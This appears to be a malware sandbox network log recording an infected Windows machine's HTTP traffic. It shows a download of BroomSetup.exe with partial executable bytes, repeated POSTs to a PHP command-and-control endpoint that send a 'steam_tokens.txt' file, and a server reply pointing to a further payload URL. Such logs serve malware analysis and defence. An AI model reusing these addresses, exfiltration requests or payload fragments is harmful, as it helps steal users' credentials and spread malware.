                                                                                                                                                                                                                            Apr 25, 2024 09:04:29.799691916 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:29 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:29.805217981 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:30.145710945 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:30 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:30.152070999 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHC
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:30.493598938 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:30 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:30.499890089 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:30.830853939 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:30 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:30.837922096 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFH
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:31.174297094 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:31 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:31.182169914 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GCBGCAFIIECBFIDHIJKF
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:31.528153896 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:31 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:31.533847094 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCA
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:31.874802113 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:31 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:31.881079912 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1743
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:32.220980883 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:32 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:32.247904062 CEST564OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 363
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file"------IJKJDAFHJDHIEBGCFIDB--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:32.590280056 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:32 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:32.665040016 CEST204OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGID
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 129011
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:33.393663883 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:33 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:33.438520908 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="message"her7h48r------DAKEBAKFHCFHIEBFBAFB--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:33.779320955 CEST223INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:33 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 52
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38
                                                                                                                                                                                                                            Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            5192.168.2.449735185.172.128.228805288C:\Users\user\Desktop\g77dRQ1Csm.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.594016075 CEST185OUTGET /BroomSetup.exe HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.228
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.802977085 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:04 GMT
                                                                                                                                                                                                                            Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                            Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
                                                                                                                                                                                                                            ETag: "4a4030-613b1bf118700"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Content-Length: 4866096
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65
                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08|7@B.rsrc<<@@JJ@@@Boole
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.802989960 CEST1289INData Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff
                                                                                                                                                                                                                            Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803003073 CEST1289INData Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f
                                                                                                                                                                                                                            Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803158045 CEST1289INData Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72
                                                                                                                                                                                                                            Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803173065 CEST1289INData Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65
                                                                                                                                                                                                                            Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803339958 CEST1289INData Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc
                                                                                                                                                                                                                            Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803354025 CEST1289INData Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00
                                                                                                                                                                                                                            Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803366899 CEST1289INData Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10
                                                                                                                                                                                                                            Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803380013 CEST1289INData Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
                                                                                                                                                                                                                            Apr 25, 2024 09:04:04.803497076 CEST1289INData Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00
                                                                                                                                                                                                                            Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
                                                                                                                                                                                                                            Apr 25, 2024 09:04:05.012756109 CEST1289INData Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65
                                                                                                                                                                                                                            Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            6192.168.2.44973620.157.87.45805180C:\Users\user\AppData\Local\Temp\u42w.3.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:04:10.280071020 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Content-Length: 300
                                                                                                                                                                                                                            Host: svc.iolo.com
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                            Apr 25, 2024 09:04:10.490652084 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                            Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                            Apr 25, 2024 09:04:10.689850092 CEST469INHTTP/1.1 200 OK
                                                                                                                                                                                                                            cache-control: private
                                                                                                                                                                                                                            content-length: 256
                                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                                            x-whom: Ioloweb9
                                                                                                                                                                                                                            date: Thu, 25 Apr 2024 07:04:09 GMT
                                                                                                                                                                                                                            set-cookie: SERVERID=svc9; path=/
                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                            Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32
                                                                                                                                                                                                                            Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            7192.168.2.44975420.157.87.45805180C:\Users\user\AppData\Local\Temp\u42w.3.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            Apr 25, 2024 09:04:25.065264940 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
